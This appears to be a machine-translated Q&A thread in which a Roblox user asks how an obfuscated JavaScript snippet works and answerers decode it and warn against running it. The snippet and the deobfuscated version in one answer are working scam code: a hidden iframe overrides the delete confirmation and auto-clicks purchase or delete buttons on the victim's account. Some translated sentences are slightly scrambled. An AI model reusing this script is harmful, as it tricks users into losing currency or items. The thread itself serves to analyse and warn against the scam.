Question

我是游戏中的用户Roblox而且有人让我这样做。我知道这很糟糕，因为我通过购买T恤来禁用可能会占用某人钱的部分，这是代码底部的行/*iframe[_0xebe7[20]] = whe;*/。

变量_0x2d54如何工作？我之前从未见过这种类型的编码，它让我很困惑，因为我想了解它。

我不确定十六进制编码是如何工作的，但我遇到了类似的帖子：Decode this strange Javascript

var _0x2d54=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x66\x6F\x72\x2D\x74\x72\x61\x64\x65\x73\x2D\x69\x74\x65\x6D\x3F\x69\x64\x3D\x36\x37\x39\x32\x38\x39\x31\x38","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x75\x72\x63\x68\x61\x73\x65\x57\x69\x74\x68\x52\x6F\x62\x75\x78\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x50\x72\x6F\x63\x65\x65\x64\x57\x69\x74\x68\x50\x75\x72\x63\x68\x61\x73\x65\x42\x75\x74\x74\x6F\x6E","\x63\x74\x6C\x30\x30\x5F\x63\x70\x68\x52\x6F\x62\x6C\x6F\x78\x5F\x62\x74\x6E\x44\x65\x6C\x65\x74\x65","\x77\x69\x64\x74\x68","\x31","\x68\x65\x69\x67\x68\x74","\x7A\x2D\x69\x6E\x64\x65\x78","\x73\x74\x79\x6C\x65","\x2D\x31","\x63\x6F\x6E\x74\x65\x6E\x74\x44\x6F\x63\x75\x6D\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x20\x6C\x6F\x61\x64\x65\x64","\x6C\x6F\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6E\x66\x69\x72\x6D\x44\x65\x6C\x65\x74\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x63\x6C\x69\x63\x6B","\x73\x72\x63","\x6F\x6E\x6C\x6F\x61\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
var _0xebe7=[_0x2d54[0],_0x2d54[1],_0x2d54[2],_0x2d54[3],_0x2d54[4],_0x2d54[5],_0x2d54[6],_0x2d54[7],_0x2d54[8],_0x2d54[9],_0x2d54[10],_0x2d54[11],_0x2d54[12],_0x2d54[13],_0x2d54[14],_0x2d54[15],_0x2d54[16],_0x2d54[17],_0x2d54[18],_0x2d54[19],_0x2d54[20],_0x2d54[21],_0x2d54[22]];
var shirt=_0xebe7[0];
var iframe=document[_0xebe7[2]](_0xebe7[1]);
var b1=_0xebe7[3];
var b2=_0xebe7[4];
var b3 =_0xebe7[5];
iframe[_0xebe7[6]] = _0xebe7[7];
iframe[_0xebe7[8]] = _0xebe7[7];
iframe[_0xebe7[10]][_0xebe7[9]] = _0xebe7[11];

function whe(){
    var _0x9b91x8 = iframe[_0xebe7[12]]; 
    console[_0xebe7[14]](_0xebe7[13]);
    if (_0x9b91x8[_0xebe7[15]](b3)){
        iframe[_0xebe7[17]][_0xebe7[16]] = (function (){
            return function (){
                return true;
            } 
        ;} 
        )();
        iframe[_0xebe7[12]][_0xebe7[15]](b3)[_0xebe7[18]]();
    } else {
        if(_0x9b91x8[_0xebe7[15]](b2)){
            iframe[_0xebe7[12]][_0xebe7[15]](b2)[_0xebe7[18]]();
        } else {
            if(_0x9b91x8[_0xebe7[15]](b1)){
                iframe[_0xebe7[12]][_0xebe7[15]](b1)[_0xebe7[18]]();
            } 
        } 
    } 
} 
iframe[_0xebe7[19] ]= shirt;
/*iframe[_0xebe7[20]] = whe;*/
document[_0xebe7[22]][_0xebe7[21]](iframe);

Answer 1

您必须努力了解此代码。开发人员很难理解 - 故意。

他们对代码进行了模糊处理，以减慢其他人的速度。

~~您可以从更改变量并运行代码开始，看看有哪些变化。这将为您提供有关该特定变量的功能的提示。但是有很多变数。~~

编辑：实际上，我接受了。尝试尽可能多地了解代码，无需运行它。正如Mathew在下面指出的那样，它可能是恶意软件。然后，一旦你有了一个更好的主意，就要仔细戳它。

Answer 2

它包含多个值的数组。

[
    "http://www.roblox.com/for-trades-item?id=67928918", 
    "iframe", 
    "createElement", 
    "ctl00_cphRoblox_PurchaseWithRobuxButton", 
    "ctl00_cphRoblox_ProceedWithPurchaseButton", 
    "ctl00_cphRoblox_btnDelete", 
    "width", 
    "1", 
    "height", 
    "z-index", 
    "style", 
    "-1", 
    "contentDocument", 
    "iframe loaded", 
    "log", 
    "getElementById", 
    "confirmDelete", 
    "contentWindow", 
    "click", 
    "src", 
    "onload", 
    "appendChild", 
    "body"
]

在我看来这是一个讨厌的剧本，你不应该运行它。

Answer 3

基本上，它会以当前页面iframe作为源添加一个invisibile http://www.roblox.com/for-trades-item?id=67928918。然后尝试：

单击“删除”按钮而不进行确认
点击“购买”按钮
点击“Robux”按钮

许多浏览器会保护您免受代码生成的点击事件的影响，但您仍然不应该运行它。

德混淆：

var iframe = document.createElement("iframe");
iframe.width = 1;
iframe.heigth = 1;
iframe.style.zIndex = -1;
iframe.src = "http://www.roblox.com/for-trades-item?id=67928918";

function whe() {
  var cDoc = iframe.contentDocument;
  console.log("iframe loaded");

  if (cDoc.getElementById("ctl00_cphRoblox_btnDelete")) {
    iframe.contentWindow.confirmDelete = (function () {
      return function () {
        return true;
      };
    })();

    iframe.contentDocument.getElementById("ctl00_cphRoblox_btnDelete").click();

  } else {
    if (cDoc.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton")) {
      iframe.contentDocument.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton").click();
    } else {
      if (cDoc.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton")) {
        iframe.contentDocument.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton").click();
      }
    }
  }
}

iframe.onload = whe;

document.body.appendChild(iframe);

Answer 4

我的评论可能会被删除，因为它的答案不是评论。

它混淆了你可以在console.log（_0xebe7）中查看变量的所有值。要获得值并提高可读性，您可以使用http://jsbeautifier.org

有人能告诉我这段代码是如何工作的吗？

4 个答案: